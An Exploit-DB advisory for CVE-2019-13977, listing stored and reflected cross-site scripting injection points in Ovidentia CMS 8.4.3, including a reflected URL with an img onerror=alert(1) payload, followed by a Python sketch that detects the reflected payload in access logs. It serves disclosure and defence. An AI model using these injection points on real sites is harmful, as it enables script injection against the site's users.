ID EDB-ID:47159
Type exploitdb
Reporter Exploit-DB
Modified 2019-07-25T00:00:00
Description
#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]
# Description: [ The vulnerability permits any kind of XSS attack: reflected, DOM and stored. ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13977 ]
# Exploit Author:
# [ Fernando Pinheiro (n3k00n3) ]
# [ Victor Flores (UserX) ]
# Vendor Homepage: [ https://www.ovidentia.org/ ]
# Version: [ 8.4.3 ]
# Tested on: [ Mac, Linux - Firefox, Safari ]
# Download: [ http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893 ]
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
>========================================================
Stored XSS
>========================================================
1. POST
http://TARGET/ovidentia/index.php?tg=groups
Field:
nom
2. POST
http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Fields:
Nom
Description
3. GET
http://TARGET/ovidentia/index.php?tg=delegat
Show groups
4. POST
http://TARGET/ovidentia/index.php?tg=site&idx=create
http://TARGET/ovidentia/index.php?tg=site&item=4
Fields:
Nom
address
description
5. POST
http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
Fields:
Libellé du champ
Explosion:
http://TARGET/ovidentia/index.php?tg=forums&idx=notices
http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST
http://TARGET/ovidentia/index.php?tg=notes&idx=Create
Fields: Notes
Explosion:
http://TARGET/ovidentia/index.php?tg=notes&idx=List
7. POST
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
Fields: all
Explosion:
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
>========================================================
REFLECTED
>========================================================
1. GET
http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
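Detection sketch for the reflected case above, added here as an example and not part of the original advisory: it scans web-server access log lines for requests to tg=admoc&idx=addoc whose item parameter decodes to HTML markup, including double-encoded values. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request-line portion of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that let a value leave an HTML attribute or text context.
HTML_BREAKOUT = re.compile(r'[<>"\']')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values (%253C) are caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_item(log_line):
    """Return the decoded `item` value if the line is a request to
    tg=admoc&idx=addoc whose item parameter contains HTML markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/index.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    if params.get("tg") != ["admoc"] or params.get("idx") != ["addoc"]:
        return None
    for raw in params.get("item", []):
        value = fully_decode(raw)
        if HTML_BREAKOUT.search(value):
            return value
    return None

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jul/2019:10:00:01 +0000] "GET /ovidentia/index.php?tg=admoc&idx=addoc&item=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Jul/2019:10:00:09 +0000] "GET /ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 5188',
    '198.51.100.7 - - [25/Jul/2019:10:00:15 +0000] "GET /ovidentia/index.php?tg=admoc&idx=addoc&item=%2522%253E%253Cb%253E HTTP/1.1" 200 5150',
    '198.51.100.7 - - [25/Jul/2019:10:00:20 +0000] "GET /ovidentia/index.php?tg=notes&idx=List HTTP/1.1" 200 4096',
]

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    found = ((n, suspicious_item(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in found if v is not None]
```

The stored cases listed earlier arrive in POST bodies, which a combined-format access log does not record, so this check covers only the reflected GET.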